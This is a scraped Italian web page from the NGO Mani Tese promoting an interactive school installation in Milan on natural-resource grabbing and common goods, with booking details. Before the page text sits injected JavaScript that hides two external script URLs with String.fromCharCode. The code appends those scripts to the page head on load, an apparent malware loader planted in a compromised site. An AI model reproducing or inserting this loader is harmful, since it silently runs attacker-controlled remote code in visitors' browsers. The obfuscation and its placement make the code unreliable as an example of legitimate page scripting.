var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} La terra mi sta stretta - Mani TeseMani Tese

Installazione didattica interattiva sull’accaparramento delle risorse naturali e i beni comuni

> OPEN DAY PER INSEGNANTI: 19 E 20 GENNAIO 2017 PRESSO LA SEDE DI MANI TESE! <

percorso

Ti sembra assurdo che si possano comprare le foreste, i mari o i ghiacciai? Purtroppo non è una cosa così strana. Tutto oggi può diventare merce. Basta pensare agli elementi naturali come a delle risorse da accaparrarsi e il gioco è fatto. Potremo  estrarli, imbottigliarli, tagliarli, trasformarli, raffinarli ed inquinarli. La corsa è a chi ci arriva prima, poco importa se bisogna fare qualche sgambetto o cacciare chi ci abita vicino, perché chi li possiede fa un sacco di soldi. Se invece trattassimo acqua, aria, terra ed energia come beni comuni potremmo utilizzarli e prendercene cura tutti insieme, senza dimenticare chi verrà dopo di noi. Siamo capaci di proteggerli, valorizzarli e usarli senza sprechi, con sobrietà e rispetto?

La terra mi sta stretta! è un’installazione didattica interattiva dedicata al tema dell’ineguale sfruttamento delle risorse naturali. Un viaggio alle radici degli elementi, a metà tra un percorso didattico e una vera e propria mostra da scoprire passo dopo passo.  Boschi incantati, planisferi giganti, forni solari, e due illustri personaggi a guidare il percorso. Gaia, madre natura, e Lustro, signore del tempo.

SFOGLIA LA GALLERY FOTOGRAFICA

La terra mi sta stretta! rappresenta un’offerta formativa unica nell’area cittadina di Milano. Il percorso, rivolto agli studenti della scuola primaria e secondaria, si svolge interamente presso la sede di Mani Tese, in piazza Gambara 7/9 a Milano e ha una durata indicativa di 3 ore.

 

COME PARTECIPARE

Per iscrivere la propria classe al percorso è necessario prenotarsi. Le iscrizioni si raccolgono telefonando all’Ufficio Educazione alla Cittadinanza Mondiale di Mani Tese:

icona telefono02-4075165

 

 

 

icona emaileCM@manitese.it

 

 

 

icona dowloadscarica il documento illustrativo

 

 

 

Con il contributo di:

logo fondazione cariplo

MANITESE OPERA IN 11 PAESI DEL MONDO